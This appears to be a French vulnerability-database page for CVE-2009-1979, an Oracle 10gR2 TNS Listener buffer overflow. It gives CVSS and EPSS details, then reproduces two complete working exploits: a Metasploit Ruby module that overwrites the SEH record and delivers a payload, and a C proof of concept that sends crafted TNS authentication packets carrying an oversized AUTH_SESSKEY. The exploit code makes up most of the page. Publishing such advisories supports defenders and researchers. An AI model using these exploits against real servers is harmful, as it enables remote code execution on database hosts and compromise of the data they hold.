Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE Other |
No informations. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16342
Date de publication : 2010-11-23 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: tns_auth_sesskey.rb 11128 2010-11-24 19:43:49Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TNS
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Oracle. When
sending a specially crafted packet containing a long AUTH_SESSKEY value
to the TNS service, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11128 $',
'References' =>
[
[ 'CVE', '2009-1979'],
[ 'OSVDB', '59110'],
[ 'BID', '36747'],
[ 'URL', 'http://blogs.conus.info/node/28' ],
[ 'URL', 'http://blogs.conus.info/node/35' ],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 0x17e,
'BadChars' => "", # none, thx memcpy!
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Oracle 10.2.0.1.0 Enterprise Edition',
{
# Untested
'Ret' => 0x011b0528 # p/p/r in oracle.exe v10.2.0.3
}
],
[ 'Oracle 10.2.0.4.0 Enterprise Edition',
{
# Tested OK - 2010-Jan-20 - jduck
'Ret' => 0x01347468 # p/p/r in oracle.exe v10.2.0.3
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 20 2009'))
register_options(
[
Opt::RPORT(1521)
], self.class)
end
def check
version = tns_version
if (not version)
raise RuntimeError, "Unable to detect version!"
end
print_status("Oracle version reply: " + version)
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
return Exploit::CheckCode::Safe
end
def exploit
mytarget = nil
if target.name =~ /Automatic/
print_status("Attempting automatic target detection...")
version = tns_version
if (not version)
raise RuntimeError, "Unable to detect version!"
end
if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
mytarget = targets[1]
elsif (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
mytarget = targets[2]
end
if (not mytarget)
raise RuntimeError, "Unable to automatically detect the target"
end
print_status("Automatically detected target \"#{mytarget.name}\"")
else
mytarget = target
print_status("Attacking using target \"#{mytarget.name}\"")
end
username = rand_text_alphanumeric(0x1c)
connect
print_status("Sending NSPTCN packet ...")
connect_data = "" +
"(DESCRIPTION=" +
"(CONNECT_DATA=" +
"(SERVICE_NAME=orcl)" +
"(CID=" +
"(PROGRAM=client.exe)" +
"(HOST=client_host)" +
")" +
")" +
"(ADDRESS=" +
"(PROTOCOL=TCP)" +
"(PORT=1521)" +
")" +
")"
nsptcn_pkt = tns_packet(connect_data)
sock.put(nsptcn_pkt)
# read NSPTRS (expecting 8 bytes)
res = sock.get_once(-1, 1)
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
print_status("Re-sending NSPTCN packet ...")
sock.put(nsptcn_pkt)
# read NSPTAC (expecting 32 bytes)
begin
res = sock.get_once(-1, 1)
rescue ::Errno::ECONNRESET, EOFError
raise RuntimeError, "OOPS, maybe the service hasn't started completely yet, try again..."
end
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
# send NA
print_status("Sending NA packet ...")
na_stuff = [0xdeadbeef].pack('N') +
"\x00\x92" +
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" +
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" +
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" +
"\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00" +
"\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00" +
"\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00" +
"\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A" +
"\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00" +
"\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
na_pkt = nsptda_packet(na_stuff)
sock.put(na_pkt)
# read response (expecting 127 bytes)
res = sock.get_once(-1, 1)
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
# send TTIPRO
print_status("Sending TTIPRO packet ...")
ttipro_stuff = "\x01\x06\x05\x04\x03\x02\x01\x00" +
"IBMPC/WIN_NT-8.1.0" +
"\x00"
ttipro_pkt = nsptda_packet(ttipro_stuff)
sock.put(ttipro_pkt)
# read response (expecting 179 bytes)
res = sock.get_once(-1, 1)
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
# send TTIDTY
print_status("Sending TTIDTY packet ...")
ttidty_stuff = "\x02\xB2\x00\xB2\x00\xD2" +
"\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01" +
"\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01" +
"\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00" +
"\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
ttidty_pkt = nsptda_packet(ttidty_stuff)
sock.put(ttidty_pkt)
# read response (expecting 22 bytes)
res = sock.get_once(-1, 1)
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
# send first auth pkt (call OSESSKEY)
print_status("Calling OSESSKEY ...")
params = []
dtyauth_pkt = dtyauth_packet(0x76, username, 1, params)
sock.put(dtyauth_pkt)
# read RPA (expecting 225 bytes)
res = sock.get_once(-1, 1)
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
# build exploit buffer
print_status("Calling kpoauth with long AUTH_SESSKEY ...")
sploit = payload.encoded
sploit << rand_text_alphanumeric(0x19a - 0x17e)
sploit << generate_seh_record(mytarget.ret)
distance = payload_space + 8 + 5
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
# ensure bad ptr is derefed
value = rand(0x3fffffff) | 0xc0000000
sploit[0x17e,4] = [value].pack('V')
# send overflow trigger packet (call kpoauth)
params = []
params << {
'Name' => 'AUTH_SESSKEY',
'Value' => sploit,
'Flag' => 1
}
dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
sock.put(dtyauth_pkt)
# expecting disconnect...
if (res = sock.get_once(-1, 1))
print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
raise RuntimeError, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/"
end
handler
disconnect
end
def tns_version
connect
version = "(CONNECT_DATA=(COMMAND=VERSION))"
pkt = tns_packet(version)
sock.put(pkt)
sock.get_once
res = sock.get_once(-1, 1)
disconnect
return res
end
def nsptda_packet(data)
pkt = [data.length + 10].pack('n') # NSPHDLEN
pkt << [0].pack('n') # NSPHDPSM
pkt << [6].pack('C') # pkt type
pkt << [0].pack('C') # reserved
pkt << [0].pack('n') # NSPHDHSM
pkt << [0].pack('n') # NSPDAFLG
pkt << data
return pkt
end
def dtyauth_packet(opi, user, flag, params)
dunno = 2
dunno = 3 if opi == 0x73
pkt = [3, opi, dunno].pack('CCC')
pkt << [-2].pack('V')
pkt << [user.length].pack('V')
pkt << [flag].pack('V')
pkt << [-2].pack('V')
pkt << [params.length].pack('V')
pkt << [-2].pack('V')
pkt << [-2].pack('V')
pkt << [user.length].pack('C')
pkt << user
params.each { |param|
name = param['Name']
pkt << [name.length].pack('V')
pkt << [name.length].pack('C')
pkt << name
val = param['Value']
pkt << [val.length].pack('V')
if (val.length > 0)
if (val.length > 0xff)
pkt << chunkify(val)
else
pkt << [val.length].pack('C')
pkt << val
end
end
flag = param['Flag']
pkt << [flag].pack('V')
}
return nsptda_packet(pkt)
end
def chunkify(buf)
ret = ""
if buf.length > 0xff
ret << "\xfe"
while (buf.length > 0xff)
ret << "\xff"
ret << buf.slice!(0, 0xff)
end
if buf.length > 0
ret << [buf.length].pack('C')
ret << buf
end
ret << "\x00"
else
ret << [buf.length].pack('C')
ret << buf
end
return ret
end
end
Exploit Database EDB-ID : 9905
Date de publication : 2009-10-29 23h00 +00:00
Auteur : Dennis Yurichev
EDB Vérifié : Yes
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>
#include <string>
void s_send (SOCKET s, char *msg, DWORD size)
{
int sent;
printf ("s_send: begin: %d bytes\n", size);
sent=send (s, (char*)msg, size, 0);
if (sent==SOCKET_ERROR)
{
printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
} else
if (sent!=size)
printf ("sent only %d bytes\n", sent);
printf ("s_send: end\n");
};
void s_recv (SOCKET s)
{
char buf[20000];
int r;
struct timeval t;
fd_set fd;
t.tv_sec=0;
t.tv_usec=100000; // 100 ms
printf ("s_recv: begin\n");
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, &fd, 0, 0, &t))
// if (select (0, &fd, 0, 0, NULL))
{
r=recv (s, buf, 20000, 0);
if (r!=0 && r!=-1)
{
printf ("got %d bytes\n", r);
}
else
{
printf ("connection lost, r=%d\n", r);
};
}
else
{
printf ("select() returns zero\n");
};
};
unsigned char NSPTCN[]=
{
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
//^^ ^^ cmd len
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
#define NSPTCN_HEADER_LEN 58
unsigned char NSPTDA[]=
{
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
// ^^ ^^ packet len
0x00, 0x00
};
#define NSPTDA_HEADER_LEN 10
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
char * buf;
int sz=size + NSPTDA_HEADER_LEN;
buf=(char*)malloc (sz);
NSPTDA[0]=( sz ) >> 8;
NSPTDA[1]=( sz ) & 0xFF;
memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
s_send (s, (char*)buf, sz);
free (buf);
};
void s_send_TNS_command (SOCKET s, const char *cmd)
{
unsigned char * pkt;
int cmd_len=strlen (cmd);
printf ("sending [%s]\n", cmd);
printf ("len: %d\n", cmd_len);
if (cmd_len<231)
{
int str_len=strlen(cmd);
int pkt_len=str_len+58;
pkt=(unsigned char*)malloc (str_len+58);
memcpy (pkt,
"\x00\x00\x00\x00\x01\x00\x00\x00"
// plenH, plenL
"\x01\x3A\x01\x2C\x00\x41\x20\x00"
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
"\x00\x00\x00\x3A\x00\x00\x02\x00"
// cmdlenH cmdlenL
"\x61\x61\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00", 58);
memcpy (pkt+58, cmd, str_len);
pkt[1]=pkt_len&0xFF;
pkt[0]=(pkt_len>>8)&0xFF;
pkt[25]=str_len&0xFF;
pkt[24]=(str_len>>8)&0xFF;
s_send (s, (char*)pkt, pkt_len);
free (pkt);
}
else
{
// something should be modified here in NSPTCN
assert (0);
};
};
bool try_host (char * h)
{
struct hostent *hp;
WSADATA wsaData;
struct sockaddr_in sin;
int r;
struct timeval t;
fd_set fd;
SOCKET s;
char pkt1318[1318];
WSAStartup(MAKEWORD(1, 1), &wsaData);
hp=gethostbyname (h);
assert (hp!=NULL);
s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
assert (s!=INVALID_SOCKET);
{
u_long on=1;
assert (ioctlsocket(s, FIONBIO, &on) != -1);
};
sin.sin_family=AF_INET;
sin.sin_port=htons(1521);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
t.tv_sec=3;
t.tv_usec=0;
FD_ZERO(&fd);
FD_SET(s, &fd);
if (select (0, 0, &fd, 0, &t))
{
printf ("connected to %s\n", h);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTRS
s_recv(s);
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
// waiting for NSPTAC
s_recv(s);
// send NA packet
s_send (s,
"\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
"\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
"\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
"\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
"\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
"\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
,156);
s_recv (s);
// send TTIPRO
s_send (s,
"\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
"\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
"\x2E\x31\x2E\x30\x00"
, 37);
s_recv (s);
// send TTIDTY
s_send (s,
"\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
"\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
"\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
"\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
"\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
, 75);
s_recv (s);
// call OSESSKEY
s_send (s,
"\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
"\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
"\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
"\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
"\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
"\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
"\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
"\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
"\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
"\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
"\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
, 218);
// call OAUTH
memcpy (pkt1318,
"\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
"\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
"\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
"\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
"\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
"\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
"\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
"\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
"\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
"\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
"\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
"\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
"\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
"\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
"\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
"\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
"\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
"\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
"\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
"\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
"\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
"\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
"\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
"\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
"\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
"\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
"\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
"\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
"\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
"\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
"\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
"\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
"\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
"\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
"\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
"\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
"\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
"\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
"\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
"\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
"\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
"\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
"\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
"\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
"\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
"\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
"\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
"\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
"\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
"\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
"\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
"\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
"\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
"\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
"\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
"\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
"\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
"\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
"\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
"\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
"\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
"\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
"\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
"\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
"\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
"\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
"\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
"\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
"\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
"\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
"\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
"\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
"\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
"\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
"\x00\x00\x00\x00\x00\x00"
,1318);
pkt1318[0x41]=0x80;
s_send (s, pkt1318, 1318);
assert (closesocket (s)==0);
return true;
}
else
{
printf ("while connect(): select() returns zero\n");
assert (closesocket (s)==0);
return false;
};
};
void main(int argc, char * argv[])
{
printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
if (argv[1]==NULL)
{
printf ("use: %s <hostname>\n", argv[0]);
return;
};
try_host (argv[1]);
};
Products Mentioned
Configuraton 0
Oracle>>Database_server >> Version 10.1.0.5
Oracle>>Database_server >> Version 10.2.0.4
Références